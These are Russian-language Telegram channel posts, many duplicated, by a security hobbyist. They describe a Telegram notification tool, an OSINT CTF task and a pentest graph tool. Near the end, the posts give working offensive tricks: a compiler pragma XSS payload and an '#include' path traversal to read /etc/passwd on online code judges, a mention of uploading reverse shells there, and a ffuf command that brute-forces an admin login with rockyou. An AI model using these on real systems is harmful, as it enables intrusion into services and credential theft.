https://github.com/ArturLukianov/tgecho
#tool #github #telegram #my #c
маленькая но в то же время удобная программа на С - отправляет сообщение в чат телеграмма через бота
удобно встраивать в пайплайны, особенно когда что-то висит в фоне или даже на сервере - достаточно просто добавить `&& tgecho "Task finished!"' и оставить задачу на сервере с nohup и в фоне
#tool #github #telegram #my #c
маленькая но в то же время удобная программа на С - отправляет сообщение в чат телеграмма через бота
удобно встраивать в пайплайны, особенно когда что-то висит в фоне или даже на сервере - достаточно просто добавить `&& tgecho "Task finished!"' и оставить задачу на сервере с nohup и в фоне
GitHub
GitHub - ArturLukianov/tgecho
Contribute to ArturLukianov/tgecho development by creating an account on GitHub.
Forwarded from tatar OSINT mindset (бедолага)
Второй таск для Tatar OSINT mindset
Новый ИБ стартап "Purple Watch" хвалится в своих социальных сетях, что их никто не сможет взломать и скоро они завоют весь рынок. Данный стартап заказал у вашей компании пентест, и в рамках OSINT этапа вам необходимо найти любую чувствительную информацию, которая может нанести ущерб компании.
Данный таск имеет 2 ответа: 1) Чувствительная информация 2) Флаг (вы сразу поймете при его нахождении)
Процесс решения вы можете обсуждать в данном чате.
Новый ИБ стартап "Purple Watch" хвалится в своих социальных сетях, что их никто не сможет взломать и скоро они завоют весь рынок. Данный стартап заказал у вашей компании пентест, и в рамках OSINT этапа вам необходимо найти любую чувствительную информацию, которая может нанести ущерб компании.
Данный таск имеет 2 ответа: 1) Чувствительная информация 2) Флаг (вы сразу поймете при его нахождении)
Процесс решения вы можете обсуждать в данном чате.
Forwarded from Artur Lukianov
Telegraph
Purple Watch
Дано: Название компании "Purple Watch" Были посты в социальных сетях Занимаются кибербезопаностью -> возможно разработкой ПО Домен Это разумно, что у стартапа должен быть сайт-визитка - показывать инвесторам, презентовать продукт. Поэтому давайте поищем домен.…
https://github.com/ArturLukianov/totacres
#tool #github #my #python #offensive #graph
почему бы не применить подход Maltego к пентесту? IP адреса, порты, сервисы, веб странички, файлы можно представить в виде узлов графа, а сканирование через nmap, поиск директорий и использование metasploit для получения бэк-коннекта - как рёбра (они же transforms в maltego)
в этой тулзе я реализовал подобный подход, хотя всё ещё есть много проблем, несмотря на красоту идеи:
- если есть узел представляющий логин/почту (например вытащенную с сайта) и другой узел, пароль - как применить transform сразу к обоим, чтобы попытаться залогиниться в ssh/ftp/панельку?
- как обрабатывать человеко читаемые данные? Не сразу же GPT тащить с собой. Можно написать regex - но их надо будет слишком много и они могут пропускать. Или обучить модельку искать пароли в документе - но нужно размечать датасет
- есть вещи, которые требуют человеческого понимания - например то, насколько перспективно искать поддиректории в директориях. Пентестер поймёт, что искать поддиректории /css/ не так полезно как /api/ . Составлять модули и формализовать все такие знания кажется не очень полезным..
Но то что оно работает - это круто
#tool #github #my #python #offensive #graph
почему бы не применить подход Maltego к пентесту? IP адреса, порты, сервисы, веб странички, файлы можно представить в виде узлов графа, а сканирование через nmap, поиск директорий и использование metasploit для получения бэк-коннекта - как рёбра (они же transforms в maltego)
в этой тулзе я реализовал подобный подход, хотя всё ещё есть много проблем, несмотря на красоту идеи:
- если есть узел представляющий логин/почту (например вытащенную с сайта) и другой узел, пароль - как применить transform сразу к обоим, чтобы попытаться залогиниться в ssh/ftp/панельку?
- как обрабатывать человеко читаемые данные? Не сразу же GPT тащить с собой. Можно написать regex - но их надо будет слишком много и они могут пропускать. Или обучить модельку искать пароли в документе - но нужно размечать датасет
- есть вещи, которые требуют человеческого понимания - например то, насколько перспективно искать поддиректории в директориях. Пентестер поймёт, что искать поддиректории /css/ не так полезно как /api/ . Составлять модули и формализовать все такие знания кажется не очень полезным..
Но то что оно работает - это круто
#offensive #compiler
Из систем для проверки кода (codeforces, итп) можно вытаскивать данные разными забавными способами
Таким макросом иногда можно получить ОС которую использует тестовая система:
Из систем для проверки кода (codeforces, итп) можно вытаскивать данные разными забавными способами
Таким макросом иногда можно получить ОС которую использует тестовая система:
cpp=
#ifdef _WIN32
#pragma message "Windows 32-bit"
#elif _WIN64
#pragma message "Windows 64-bit"
#elif APPLE || MACH
#pragma message "Mac OSX"
#elif linux
#pragma message "Linux"
#elif FreeBSD
#pragma message "FreeBSD"
#elif unix || unix__
#pragma message "Unix"
#else
#pragma message "Other"
#endif
int main() {}
Иногда с помощью макроса можно затриггерить XSS:#pragma message "</pre><script>alert('xss')</script>"
int main() {}
А в некоторых случаях даже читать файлы инклудом:#include "../../../../../../../../../etc/passwd"
int main() {}
И конечно никто не отменял возможность залить рев-шел (но лучше заливать сразу последовательность команд с выводом, так как таймлимит часто убивает программу до того как что-то успеешь сделать)#offensive #burp #ffuf #web #bruteforce
Если использовать Burp Intruder для брутфорса (пиратку точно), то он может просто умирать при большом количестве запросов - вероятно кончается память для хранения ответов.
Один из вариантов - использовать ffuf для брутфорса.
Можно скопировать запрос из Developer Tools браузера в curl запрос -> заменить curl на ffuf -> добавить -u перед url и вордлист -> настроить фильтры на incorrect username -> наслаждаться многопоточным опенсорсным http брутфорсом который можно ставить на паузу
Если использовать Burp Intruder для брутфорса (пиратку точно), то он может просто умирать при большом количестве запросов - вероятно кончается память для хранения ответов.
Один из вариантов - использовать ffuf для брутфорса.
Можно скопировать запрос из Developer Tools браузера в curl запрос -> заменить curl на ffuf -> добавить -u перед url и вордлист -> настроить фильтры на incorrect username -> наслаждаться многопоточным опенсорсным http брутфорсом который можно ставить на паузу
ffuf -w ./Wordlists/rockyou.txt -X POST -u https://somepage.com/login --data 'username=admin&password=FUZZ'
